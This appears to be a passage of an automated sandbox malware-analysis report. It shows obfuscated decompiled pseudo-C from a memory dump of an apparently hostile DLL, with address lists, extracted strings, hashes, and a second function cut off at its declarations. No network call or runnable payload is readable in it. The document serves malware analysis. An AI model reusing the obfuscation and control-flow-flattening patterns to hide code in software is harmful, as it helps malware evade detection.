                                                                                                                                                                                      				_v1720 = _v1720 ^ 0xfb7d43ee;
                                                                                                                                                                                      				_v1720 = _v1720 + 0xffff47bd;
                                                                                                                                                                                      				_v1720 = _v1720 ^ 0xfba62c54;
                                                                                                                                                                                      				_v1608 = 0x3d3a3f;
                                                                                                                                                                                      				_v1608 = _v1608 << 0xf;
                                                                                                                                                                                      				_v1608 = _v1608 ^ 0x9d12823b;
                                                                                                                                                                                      				_v1740 = 0x980e3b;
                                                                                                                                                                                      				_v1740 = _v1740 + 0xffff1fe6;
                                                                                                                                                                                      				_v1740 = _v1740 * 0x6e;
                                                                                                                                                                                      				_v1740 = _v1740 << 0xa;
                                                                                                                                                                                      				_v1740 = _v1740 ^ 0xd74f139c;
                                                                                                                                                                                      				_v1748 = 0xf6a327;
                                                                                                                                                                                      				_v1748 = _v1748 | 0x24bb4535;
                                                                                                                                                                                      				_v1748 = _v1748 / _t660;
                                                                                                                                                                                      				_v1748 = _v1748 + 0xffffd901;
                                                                                                                                                                                      				_v1748 = _v1748 ^ 0x00a06448;
                                                                                                                                                                                      				_v1756 = 0x23281c;
                                                                                                                                                                                      				_v1756 = _v1756 << 0xd;
                                                                                                                                                                                      				_v1756 = _v1756 + 0x3ace;
                                                                                                                                                                                      				_v1756 = _v1756 + 0xffffbc66;
                                                                                                                                                                                      				_v1756 = _v1756 ^ 0x6508bae1;
                                                                                                                                                                                      				_v1680 = 0xefa5f3;
                                                                                                                                                                                      				_v1680 = _v1680 + 0xd649;
                                                                                                                                                                                      				_v1680 = _v1680 >> 4;
                                                                                                                                                                                      				_v1680 = _v1680 ^ 0x000b71c0;
                                                                                                                                                                                      				_v1688 = 0xd7d7d;
                                                                                                                                                                                      				_v1688 = _v1688 << 6;
                                                                                                                                                                                      				_v1688 = _v1688 ^ 0x39cce6e9;
                                                                                                                                                                                      				_v1688 = _v1688 ^ 0x3a96b3cf;
                                                                                                                                                                                      				_v1696 = 0xe8190a;
                                                                                                                                                                                      				_v1696 = _v1696 + 0xffff8bcc;
                                                                                                                                                                                      				_v1696 = _v1696 * 0x45;
                                                                                                                                                                                      				_v1696 = _v1696 ^ 0x3e6c45dc;
                                                                                                                                                                                      				_v1732 = 0xaf65ed;
                                                                                                                                                                                      				_v1732 = _v1732 >> 1;
                                                                                                                                                                                      				_v1732 = _v1732 << 6;
                                                                                                                                                                                      				_v1732 = _v1732 + 0x301f;
                                                                                                                                                                                      				_v1732 = _v1732 ^ 0x15ed60b7;
                                                                                                                                                                                      				_v1664 = 0xbf44dc;
                                                                                                                                                                                      				_v1664 = _v1664 | 0xed1757a9;
                                                                                                                                                                                      				_v1664 = _v1664 ^ 0xd2cd8926;
                                                                                                                                                                                      				_v1664 = _v1664 ^ 0x3f771003;
                                                                                                                                                                                      				_v1672 = 0xa3137e;
                                                                                                                                                                                      				_v1672 = _v1672 | 0x61a4f07f;
                                                                                                                                                                                      				_v1672 = _v1672 << 4;
                                                                                                                                                                                      				_v1672 = _v1672 ^ 0x1a745c42;
                                                                                                                                                                                      				_t661 = _v1584;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t556 = 0xd83910a;
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						L2:
                                                                                                                                                                                      						_t597 = 0xecce1ce;
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							L3:
                                                                                                                                                                                      							while(_t663 != 0x2f38181) {
                                                                                                                                                                                      								if(_t663 == 0x396a438) {
                                                                                                                                                                                      									return E003E9038(_v1732, _v1664, _v1584, _v1672);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t663 == 0x4a96617) {
                                                                                                                                                                                      									_t663 = 0x971ed5f;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t663 == 0x971ed5f) {
                                                                                                                                                                                      									_t560 = E003F27E2();
                                                                                                                                                                                      									__eflags = _t560 - E003D576B();
                                                                                                                                                                                      									_t556 = 0xd83910a;
                                                                                                                                                                                      									_t663 = 0x2f38181;
                                                                                                                                                                                      									_t661 =  !=  ? 0xd83910a : 0xf28d74f;
                                                                                                                                                                                      									L2:
                                                                                                                                                                                      									_t597 = 0xecce1ce;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t663 == 0xa7e2b43) {
                                                                                                                                                                                      									_push(_v1608);
                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                      									_push( &_v1564);
                                                                                                                                                                                      									_push(_v1720);
                                                                                                                                                                                      									_push(_v1712);
                                                                                                                                                                                      									_push(_v1764);
                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                      									_push( &_v1580);
                                                                                                                                                                                      									_t564 = E003F06EF(_v1728, __eflags);
                                                                                                                                                                                      									__eflags = _t564;
                                                                                                                                                                                      									if(_t564 == 0) {
                                                                                                                                                                                      										L26:
                                                                                                                                                                                      										return _t564;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									E003E9038(_v1740, _v1748, _v1580, _v1756);
                                                                                                                                                                                      									return E003E9038(_v1680, _v1688, _v1576, _v1696);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t663 == 0xd093482) {
                                                                                                                                                                                      									E003D24AA(_t597, _v1708, __eflags,  &_v1044, _v1744, _v1604, _v1660);
                                                                                                                                                                                      									_t570 = E003E0F17(_v1768, _v1752,  &_v1044, _v1636, _v1776);
                                                                                                                                                                                      									_t671 = _t668 + 0x1c;
                                                                                                                                                                                      									 *_t570 = 0;
                                                                                                                                                                                      									E003ECC3F(_v1588,  &_v524, __eflags, _v1684);
                                                                                                                                                                                      									 *_t671 = 0x3d11d0;
                                                                                                                                                                                      									E003F06A6(__eflags,  &_v1044, _v1668, E003F0AD3(_v1628, _v1800, __eflags), _v1592, _v1700,  &_v1564, _v1796);
                                                                                                                                                                                      									E003E2EED(_v1612, _v1600, _v1620, _t572);
                                                                                                                                                                                      									_t577 = E003F3306( &_v1564, _v1640, _v1648, _v1656, _t583, _v1788);
                                                                                                                                                                                      									_t668 = _t671 + 0x34;
                                                                                                                                                                                      									__eflags = _t577;
                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                      										L12:
                                                                                                                                                                                      										_t663 = 0x396a438;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											L1:
                                                                                                                                                                                      											_t556 = 0xd83910a;
                                                                                                                                                                                      											goto L2;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t556 = 0xd83910a;
                                                                                                                                                                                      									__eflags = _t661 - 0xd83910a;
                                                                                                                                                                                      									_t597 = 0xecce1ce;
                                                                                                                                                                                      									_t663 =  ==  ? 0xecce1ce : 0xa7e2b43;
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(_t663 != _t597) {
                                                                                                                                                                                      									goto L21;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_push(_t597);
                                                                                                                                                                                      								_t579 = E003E473A( &_v1580, _v1792, _v1584, _v1692, _v1736,  &_v1564, _v1644, _v1704);
                                                                                                                                                                                      								_t668 = _t668 + 0x20;
                                                                                                                                                                                      								if(_t579 != 0) {
                                                                                                                                                                                      									E003E9038(_v1784, _v1716, _v1580, _v1760);
                                                                                                                                                                                      									E003E9038(_v1596, _v1652, _v1576, _v1676);
                                                                                                                                                                                      									_t668 = _t668 + 0x10;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t661 - _t556;
                                                                                                                                                                                      							if(_t661 != _t556) {
                                                                                                                                                                                      								_t663 = 0xd093482;
                                                                                                                                                                                      								goto L21;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_push(_t597);
                                                                                                                                                                                      							_push(_v1772);
                                                                                                                                                                                      							_t564 = E003D7D87(_v1624, _v1724,  &_v1584, _t597);
                                                                                                                                                                                      							_t668 = _t668 + 0x14;
                                                                                                                                                                                      							__eflags = _t564;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t663 = 0xd093482;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      							L21:
                                                                                                                                                                                      							__eflags = _t663 - 0xdeb83c1;
                                                                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                                                                      						return _t556;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}
























































































                                                                                                                                                                                      0x003d6c04
                                                                                                                                                                                      0x003d6c0e
                                                                                                                                                                                      0x003d6c19
                                                                                                                                                                                      0x003d6c24
                                                                                                                                                                                      0x003d6c2f
                                                                                                                                                                                      0x003d6c37
                                                                                                                                                                                      0x003d6c3f
                                                                                                                                                                                      0x003d6c47
                                                                                                                                                                                      0x003d6c4c
                                                                                                                                                                                      0x003d6c54
                                                                                                                                                                                      0x003d6c5f
                                                                                                                                                                                      0x003d6c67
                                                                                                                                                                                      0x003d6c72
                                                                                                                                                                                      0x003d6c8a
                                                                                                                                                                                      0x003d6c8f
                                                                                                                                                                                      0x003d6c91
                                                                                                                                                                                      0x003d6c98
                                                                                                                                                                                      0x003d6c9d
                                                                                                                                                                                      0x003d6ca8
                                                                                                                                                                                      0x003d6cb0
                                                                                                                                                                                      0x003d6cb5
                                                                                                                                                                                      0x003d6cbd
                                                                                                                                                                                      0x003d6cc5
                                                                                                                                                                                      0x003d6cd3
                                                                                                                                                                                      0x003d6cd8
                                                                                                                                                                                      0x003d6cdc
                                                                                                                                                                                      0x003d6ceb
                                                                                                                                                                                      0x003d6cec
                                                                                                                                                                                      0x003d6cf0
                                                                                                                                                                                      0x003d6cf8
                                                                                                                                                                                      0x003d6d00
                                                                                                                                                                                      0x003d6d05
                                                                                                                                                                                      0x003d6d0d
                                                                                                                                                                                      0x003d6d15
                                                                                                                                                                                      0x003d6d1d
                                                                                                                                                                                      0x003d6d25
                                                                                                                                                                                      0x003d6d32
                                                                                                                                                                                      0x003d6d36
                                                                                                                                                                                      0x003d6d3e
                                                                                                                                                                                      0x003d6d54
                                                                                                                                                                                      0x003d6d5b
                                                                                                                                                                                      0x003d6d66
                                                                                                                                                                                      0x003d6d71
                                                                                                                                                                                      0x003d6d7c
                                                                                                                                                                                      0x003d6d87
                                                                                                                                                                                      0x003d6d8f
                                                                                                                                                                                      0x003d6d97
                                                                                                                                                                                      0x003d6d9f
                                                                                                                                                                                      0x003d6da7
                                                                                                                                                                                      0x003d6daf
                                                                                                                                                                                      0x003d6db7
                                                                                                                                                                                      0x003d6dca
                                                                                                                                                                                      0x003d6dce
                                                                                                                                                                                      0x003d6dd6
                                                                                                                                                                                      0x003d6de1
                                                                                                                                                                                      0x003d6de9
                                                                                                                                                                                      0x003d6df4
                                                                                                                                                                                      0x003d6dfc
                                                                                                                                                                                      0x003d6e04
                                                                                                                                                                                      0x003d6e0e
                                                                                                                                                                                      0x003d6e16
                                                                                                                                                                                      0x003d6e1e
                                                                                                                                                                                      0x003d6e29
                                                                                                                                                                                      0x003d6e34
                                                                                                                                                                                      0x003d6e3f
                                                                                                                                                                                      0x003d6e4a
                                                                                                                                                                                      0x003d6e52
                                                                                                                                                                                      0x003d6e5d
                                                                                                                                                                                      0x003d6e68
                                                                                                                                                                                      0x003d6e73
                                                                                                                                                                                      0x003d6e7b
                                                                                                                                                                                      0x003d6e86
                                                                                                                                                                                      0x003d6e95
                                                                                                                                                                                      0x003d6e98
                                                                                                                                                                                      0x003d6e9c
                                                                                                                                                                                      0x003d6ea9
                                                                                                                                                                                      0x003d6ead
                                                                                                                                                                                      0x003d6eb5
                                                                                                                                                                                      0x003d6ec0
                                                                                                                                                                                      0x003d6ecb
                                                                                                                                                                                      0x003d6ed6
                                                                                                                                                                                      0x003d6ee1
                                                                                                                                                                                      0x003d6eec
                                                                                                                                                                                      0x003d6ef7
                                                                                                                                                                                      0x003d6f02
                                                                                                                                                                                      0x003d6f0a
                                                                                                                                                                                      0x003d6f12
                                                                                                                                                                                      0x003d6f1a
                                                                                                                                                                                      0x003d6f22
                                                                                                                                                                                      0x003d6f2a
                                                                                                                                                                                      0x003d6f2f
                                                                                                                                                                                      0x003d6f3c
                                                                                                                                                                                      0x003d6f40
                                                                                                                                                                                      0x003d6f48
                                                                                                                                                                                      0x003d6f53
                                                                                                                                                                                      0x003d6f5e
                                                                                                                                                                                      0x003d6f69
                                                                                                                                                                                      0x003d6f7f
                                                                                                                                                                                      0x003d6f86
                                                                                                                                                                                      0x003d6f91
                                                                                                                                                                                      0x003d6f9c
                                                                                                                                                                                      0x003d6fa4
                                                                                                                                                                                      0x003d6faf
                                                                                                                                                                                      0x003d6fc1
                                                                                                                                                                                      0x003d6fc4
                                                                                                                                                                                      0x003d6fcb
                                                                                                                                                                                      0x003d6fd6
                                                                                                                                                                                      0x003d6fe1
                                                                                                                                                                                      0x003d6fec
                                                                                                                                                                                      0x003d6ff7
                                                                                                                                                                                      0x003d7002
                                                                                                                                                                                      0x003d700d
                                                                                                                                                                                      0x003d7018
                                                                                                                                                                                      0x003d7020
                                                                                                                                                                                      0x003d702d
                                                                                                                                                                                      0x003d7031
                                                                                                                                                                                      0x003d7039
                                                                                                                                                                                      0x003d7041
                                                                                                                                                                                      0x003d7049
                                                                                                                                                                                      0x003d7051
                                                                                                                                                                                      0x003d7056
                                                                                                                                                                                      0x003d705e
                                                                                                                                                                                      0x003d7069
                                                                                                                                                                                      0x003d7074
                                                                                                                                                                                      0x003d707c
                                                                                                                                                                                      0x003d7087
                                                                                                                                                                                      0x003d708f
                                                                                                                                                                                      0x003d709f
                                                                                                                                                                                      0x003d70a4
                                                                                                                                                                                      0x003d70ae
                                                                                                                                                                                      0x003d70b3
                                                                                                                                                                                      0x003d70b7
                                                                                                                                                                                      0x003d70bf
                                                                                                                                                                                      0x003d70ca
                                                                                                                                                                                      0x003d70d5
                                                                                                                                                                                      0x003d70e0
                                                                                                                                                                                      0x003d70e8
                                                                                                                                                                                      0x003d70f0
                                                                                                                                                                                      0x003d70f4
                                                                                                                                                                                      0x003d70fc
                                                                                                                                                                                      0x003d7104
                                                                                                                                                                                      0x003d7108
                                                                                                                                                                                      0x003d7110
                                                                                                                                                                                      0x003d7115
                                                                                                                                                                                      0x003d711d
                                                                                                                                                                                      0x003d7125
                                                                                                                                                                                      0x003d7133
                                                                                                                                                                                      0x003d7138
                                                                                                                                                                                      0x003d713c
                                                                                                                                                                                      0x003d7144
                                                                                                                                                                                      0x003d7152
                                                                                                                                                                                      0x003d7157
                                                                                                                                                                                      0x003d7162
                                                                                                                                                                                      0x003d7165
                                                                                                                                                                                      0x003d7171
                                                                                                                                                                                      0x003d7175
                                                                                                                                                                                      0x003d717d
                                                                                                                                                                                      0x003d7193
                                                                                                                                                                                      0x003d719a
                                                                                                                                                                                      0x003d71a5
                                                                                                                                                                                      0x003d71b0
                                                                                                                                                                                      0x003d71bb
                                                                                                                                                                                      0x003d71c6
                                                                                                                                                                                      0x003d71d8
                                                                                                                                                                                      0x003d71dd
                                                                                                                                                                                      0x003d71e6
                                                                                                                                                                                      0x003d71f1
                                                                                                                                                                                      0x003d71fc
                                                                                                                                                                                      0x003d7208
                                                                                                                                                                                      0x003d720b
                                                                                                                                                                                      0x003d720f
                                                                                                                                                                                      0x003d7217
                                                                                                                                                                                      0x003d721f
                                                                                                                                                                                      0x003d7227
                                                                                                                                                                                      0x003d722f
                                                                                                                                                                                      0x003d7237
                                                                                                                                                                                      0x003d723f
                                                                                                                                                                                      0x003d7249
                                                                                                                                                                                      0x003d7256
                                                                                                                                                                                      0x003d7264
                                                                                                                                                                                      0x003d7269
                                                                                                                                                                                      0x003d726d
                                                                                                                                                                                      0x003d7275
                                                                                                                                                                                      0x003d727d
                                                                                                                                                                                      0x003d7285
                                                                                                                                                                                      0x003d728d
                                                                                                                                                                                      0x003d7295
                                                                                                                                                                                      0x003d72a0
                                                                                                                                                                                      0x003d72a8
                                                                                                                                                                                      0x003d72b3
                                                                                                                                                                                      0x003d72bb
                                                                                                                                                                                      0x003d72c8
                                                                                                                                                                                      0x003d72cc
                                                                                                                                                                                      0x003d72d1
                                                                                                                                                                                      0x003d72d9
                                                                                                                                                                                      0x003d72e1
                                                                                                                                                                                      0x003d72ef
                                                                                                                                                                                      0x003d72f3
                                                                                                                                                                                      0x003d72fb
                                                                                                                                                                                      0x003d7303
                                                                                                                                                                                      0x003d730b
                                                                                                                                                                                      0x003d7310
                                                                                                                                                                                      0x003d7318
                                                                                                                                                                                      0x003d7320
                                                                                                                                                                                      0x003d7328
                                                                                                                                                                                      0x003d7333
                                                                                                                                                                                      0x003d733e
                                                                                                                                                                                      0x003d7346
                                                                                                                                                                                      0x003d7351
                                                                                                                                                                                      0x003d735c
                                                                                                                                                                                      0x003d7364
                                                                                                                                                                                      0x003d736f
                                                                                                                                                                                      0x003d737a
                                                                                                                                                                                      0x003d7382
                                                                                                                                                                                      0x003d738f
                                                                                                                                                                                      0x003d7393
                                                                                                                                                                                      0x003d739b
                                                                                                                                                                                      0x003d73a3
                                                                                                                                                                                      0x003d73a7
                                                                                                                                                                                      0x003d73ac
                                                                                                                                                                                      0x003d73b4
                                                                                                                                                                                      0x003d73bc
                                                                                                                                                                                      0x003d73c7
                                                                                                                                                                                      0x003d73d2
                                                                                                                                                                                      0x003d73dd
                                                                                                                                                                                      0x003d73e8
                                                                                                                                                                                      0x003d73f3
                                                                                                                                                                                      0x003d73fe
                                                                                                                                                                                      0x003d7406
                                                                                                                                                                                      0x003d7411
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d741d
                                                                                                                                                                                      0x003d741d
                                                                                                                                                                                      0x003d741d
                                                                                                                                                                                      0x003d7422
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7422
                                                                                                                                                                                      0x003d7430
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d772d
                                                                                                                                                                                      0x003d743c
                                                                                                                                                                                      0x003d763b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d763b
                                                                                                                                                                                      0x003d7448
                                                                                                                                                                                      0x003d7616
                                                                                                                                                                                      0x003d7622
                                                                                                                                                                                      0x003d7629
                                                                                                                                                                                      0x003d762e
                                                                                                                                                                                      0x003d7633
                                                                                                                                                                                      0x003d741d
                                                                                                                                                                                      0x003d741d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d741d
                                                                                                                                                                                      0x003d7454
                                                                                                                                                                                      0x003d7699
                                                                                                                                                                                      0x003d76a7
                                                                                                                                                                                      0x003d76a9
                                                                                                                                                                                      0x003d76aa
                                                                                                                                                                                      0x003d76b5
                                                                                                                                                                                      0x003d76b9
                                                                                                                                                                                      0x003d76c1
                                                                                                                                                                                      0x003d76c3
                                                                                                                                                                                      0x003d76c4
                                                                                                                                                                                      0x003d76cc
                                                                                                                                                                                      0x003d76ce
                                                                                                                                                                                      0x003d7738
                                                                                                                                                                                      0x003d7738
                                                                                                                                                                                      0x003d7738
                                                                                                                                                                                      0x003d76e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7709
                                                                                                                                                                                      0x003d7460
                                                                                                                                                                                      0x003d750c
                                                                                                                                                                                      0x003d752c
                                                                                                                                                                                      0x003d7531
                                                                                                                                                                                      0x003d753d
                                                                                                                                                                                      0x003d754e
                                                                                                                                                                                      0x003d755e
                                                                                                                                                                                      0x003d759e
                                                                                                                                                                                      0x003d75bc
                                                                                                                                                                                      0x003d75e2
                                                                                                                                                                                      0x003d75e7
                                                                                                                                                                                      0x003d75ea
                                                                                                                                                                                      0x003d75ec
                                                                                                                                                                                      0x003d74e7
                                                                                                                                                                                      0x003d74e7
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d7418
                                                                                                                                                                                      0x003d75f2
                                                                                                                                                                                      0x003d75fc
                                                                                                                                                                                      0x003d75fe
                                                                                                                                                                                      0x003d7603
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7603
                                                                                                                                                                                      0x003d7468
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d746e
                                                                                                                                                                                      0x003d749f
                                                                                                                                                                                      0x003d74a4
                                                                                                                                                                                      0x003d74a9
                                                                                                                                                                                      0x003d74be
                                                                                                                                                                                      0x003d74df
                                                                                                                                                                                      0x003d74e4
                                                                                                                                                                                      0x003d74e4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d74a9
                                                                                                                                                                                      0x003d7645
                                                                                                                                                                                      0x003d7647
                                                                                                                                                                                      0x003d7683
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7683
                                                                                                                                                                                      0x003d7649
                                                                                                                                                                                      0x003d764a
                                                                                                                                                                                      0x003d7669
                                                                                                                                                                                      0x003d766e
                                                                                                                                                                                      0x003d7671
                                                                                                                                                                                      0x003d7673
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7679
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7688
                                                                                                                                                                                      0x003d7688
                                                                                                                                                                                      0x003d7688
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003d7422
                                                                                                                                                                                      0x003d741d

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ".$'CP$/ow$C+~$C+~$MW$_q$_q$by$k8?N$}?r$}}$$
                                                                                                                                                                                      • API String ID: 0-2029320251
                                                                                                                                                                                      • Opcode ID: 593b73870e972f99252e77cc2be7dba5ae0c2ab82b3f2c850e723df7a1681271
                                                                                                                                                                                      • Instruction ID: 1318e94a98b9abaa522d6b512b075344f6b355785493182ec9f3767af78e30ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 593b73870e972f99252e77cc2be7dba5ae0c2ab82b3f2c850e723df7a1681271
                                                                                                                                                                                      • Instruction Fuzzy Hash: 204200B250C3818FD779CF65C54AA9BBBE2BBC4304F10891EE6D996260D7B18909CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • .assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6E9DBB04, 6E9DBEC7
                                                                                                                                                                                      • .llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy, xrefs: 6E9DA6ED
                                                                                                                                                                                      • __ZN, xrefs: 6E9DABD7
                                                                                                                                                                                      • $, xrefs: 6E9DBA33
                                                                                                                                                                                      • called `Option::unwrap()` on a `None` value, xrefs: 6E9DBF6E
                                                                                                                                                                                      • $, xrefs: 6E9DBA23
                                                                                                                                                                                      • h, xrefs: 6E9DB6EB
                                                                                                                                                                                      • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6E9DB3C9
                                                                                                                                                                                      • @*&<>()C,, xrefs: 6E9DBE70, 6E9DBF32
                                                                                                                                                                                      • SizeLimitExhausted, xrefs: 6E9DC0D9
                                                                                                                                                                                      • called `Result::unwrap()` on an `Err` value, xrefs: 6E9DBF8D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $$$$.assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb$.llvm.C:svwynxjwzbblyzyvbzvnadthqulrlxkuotzeuguljzqomqtcmfyjwyjxmyqztcdrlrqahaumjphvoxxzmknnzpgbuuldukigsulxy$@*&<>()C,$SizeLimitExhausted$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value$h
                                                                                                                                                                                      • API String ID: 0-2155986594
                                                                                                                                                                                      • Opcode ID: cf9eb9a1f4de3d2e4ad3cd2bee1a3afa2630dd6dd7d701b9a82defa66fd93969
                                                                                                                                                                                      • Instruction ID: 1fa022e5a9ff52d525dca4934d29e6e1606c0016bc858a5f101d29193bab2fe2
                                                                                                                                                                                      • Opcode Fuzzy Hash: cf9eb9a1f4de3d2e4ad3cd2bee1a3afa2630dd6dd7d701b9a82defa66fd93969
                                                                                                                                                                                      • Instruction Fuzzy Hash: 95E21671608B629FD714CE98C49066EB7F2AFC5350F14CA1DE4A98B399E770D849CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                      			E003E4DC5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                      				char _v256;
                                                                                                                                                                                      				char _v260;
                                                                                                                                                                                      				char _v264;
                                                                                                                                                                                      				intOrPtr _v268;
                                                                                                                                                                                      				intOrPtr _v272;
                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                      				char _v288;
                                                                                                                                                                                      				char _v292;
                                                                                                                                                                                      				char _v296;
                                                                                                                                                                                      				signed int _v300;
                                                                                                                                                                                      				signed int _v304;
                                                                                                                                                                                      				signed int _v308;
                                                                                                                                                                                      				signed int _v312;
                                                                                                                                                                                      				signed int _v316;
                                                                                                                                                                                      				signed int _v320;
                                                                                                                                                                                      				signed int _v324;
                                                                                                                                                                                      				signed int _v328;
                                                                                                                                                                                      				signed int _v332;
                                                                                                                                                                                      				signed int _v336;
                                                                                                                                                                                      				signed int _v340;
                                                                                                                                                                                      				signed int _v344;
                                                                                                                                                                                      				signed int _v348;
                                                                                                                                                                                      				signed int _v352;
                                                                                                                                                                                      				signed int _v356;
                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                      				signed int _v364;
                                                                                                                                                                                      				signed int _v368;
                                                                                                                                                                                      				signed int _v372;
                                                                                                                                                                                      				signed int _v376;
                                                                                                                                                                                      				signed int _v380;
                                                                                                                                                                                      				signed int _v384;
                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                      				signed int _v392;
                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                      				signed int _v408;
                                                                                                                                                                                      				signed int _v412;
                                                                                                                                                                                      				unsigned int _v416;
                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                      				signed int _v428;
                                                                                                                                                                                      				signed int _v432;
                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                      				signed int _v440;
                                                                                                                                                                                      				unsigned int _v444;
                                                                                                                                                                                      				signed int _v448;
                                                                                                                                                                                      				void* _t395;
                                                                                                                                                                                      				void* _t428;
                                                                                                                                                                                      				intOrPtr _t431;
                                                                                                                                                                                      				void* _t436;
                                                                                                                                                                                      				void* _t445;
                                                                                                                                                                                      				void* _t447;
                                                                                                                                                                                      				intOrPtr _t452;
                                                                                                                                                                                      				void* _t457;
                                                                                                                                                                                      				char _t459;
                                                                                                                                                                                      				void* _t462;
                                                                                                                                                                                      				intOrPtr _t465;
                                                                                                                                                                                      				intOrPtr _t468;
                                                                                                                                                                                      				void* _t476;
                                                                                                                                                                                      				intOrPtr _t500;
                                                                                                                                                                                      				void* _t511;
                                                                                                                                                                                      				signed int _t512;
                                                                                                                                                                                      				signed int _t513;
                                                                                                                                                                                      				signed int _t514;
                                                                                                                                                                                      				signed int _t515;
                                                                                                                                                                                      				signed int _t516;
                                                                                                                                                                                      				signed int _t517;
                                                                                                                                                                                      				signed int _t518;
                                                                                                                                                                                      				signed int _t519;
                                                                                                                                                                                      				signed int _t520;
                                                                                                                                                                                      				void* _t521;
                                                                                                                                                                                      				signed int* _t524;
